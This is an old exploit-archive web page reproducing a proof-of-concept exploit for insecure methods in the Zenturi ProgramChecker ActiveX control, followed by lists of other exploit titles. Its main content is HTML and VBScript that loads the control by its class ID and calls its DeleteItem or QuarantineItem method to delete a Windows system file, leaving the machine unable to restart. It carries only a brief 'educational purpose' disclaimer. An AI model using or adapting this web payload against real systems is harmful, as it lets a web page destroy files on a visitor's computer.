exploits , vulnerabilities , articles , Zenturi ProgramChecker ActiveX Multiple Insecure Methods Exploit

2007-06-13 Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-09 Zenturi ProgramChecker ActiveX NavigateUrl() Insecure Method Exploit
2007-06-08 Yahoo! Messenger Webcam 8.1 ActiveX Remote Buffer Overflow Exploit 2
2007-06-08 Yahoo! Messenger Webcam 8.1 ActiveX Remote Buffer Overflow Exploit

2007-06-09

Zenturi ProgramChecker ActiveX Multiple Insecure Methods Exploit

Rated as : High Risk

<pre>
<code><span style="font: 10pt Courier New;"><span
class="general1-symbol">-----------------------------------------------------------------------------
 <b>Zenturi ProgramChecker ActiveX Control Multiple Insecure
Methods</b>
 url: http://www.programchecker.com/activeintro.aspx

 author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://shinnai.altervista.org
 
 This was written for educational purpose. Use it at your own risk.
 Author will be not be responsible for any damage.
 
 <b><font color="#FF0000">THE EXPLOIT WILL DELETE
THE system.ini FILE SO BE SURE TO MAKE A COPY OF
 IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT
RESTART!</font></b>

 Tested on Windows XP Professional SP2 all patched, with Internet Explorer
7
-----------------------------------------------------------------------------

<object classid='clsid:41A5D8DB-EA47-4DE9-B249-1F55738FEA20' id='test'
width='0' height='0'></object>

<input language=VBScript onclick=tryMe() type=button value="Click
here to start the test">

<select style="width: 404px" name="Pucca">
  <option value = "DeleteItem">DeleteItem</option>

  <option value =
"QuarantineItem">QuarantineItem</option>
</select>

<script language='vbscript'>
 Sub tryMe
  On Error Resume Next
   Dim MyMsg
   If(MsgBox("This was written for educational purpose. Use it at
your own risk." & vbCrLf & _
             "Author will be not be responsible for any damage."
& vbCrLf & vbCrLf & _
             "THIS EXPLOIT WILL DELETE THE system.ini FILE SO BE SURE
TO MAKE A COPY" & _
             " OF IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT
RESTART!" & VBcRlF & "ARE YOU" & _
             " SURE YOU REALLY WANT TO RUN THIS
EXPLOIT?",4)=vbYes) Then
     if Pucca.value = "DeleteItem" Then
      test.DeleteItem "c:windowssystem_.ini"
,"c:windowssystem_.ini"
      MyMsg = MsgBox ("Check now the file system.ini" & vbCrLf &
"It's deleted.", 64,"Zenturi ProgramChecker ActiveX")
     ElseIf Pucca.value = "QuarantineItem" Then
      test.QuarantineItem "c:windowssystem_.ini"
      MyMsg = MsgBox ("Check now the file system.ini" & vbCrLf &
"It's deleted.", 64,"Zenturi ProgramChecker ActiveX")
     End If
   Else
    MyMsg = MsgBox ("Nice, be safe!", 64, "Zenturi
ProgramChecker ActiveX")
   End If 
 End Sub
</script>
</span></span>
</code></pre>

securitydot.net - 2007-06-09

Exploits - newest 10 RSS | More

2007-06-15 48881 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 27765 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 34817 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 25771 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 16828 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 14134 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 16642 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 14182 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 29466 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 14678 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit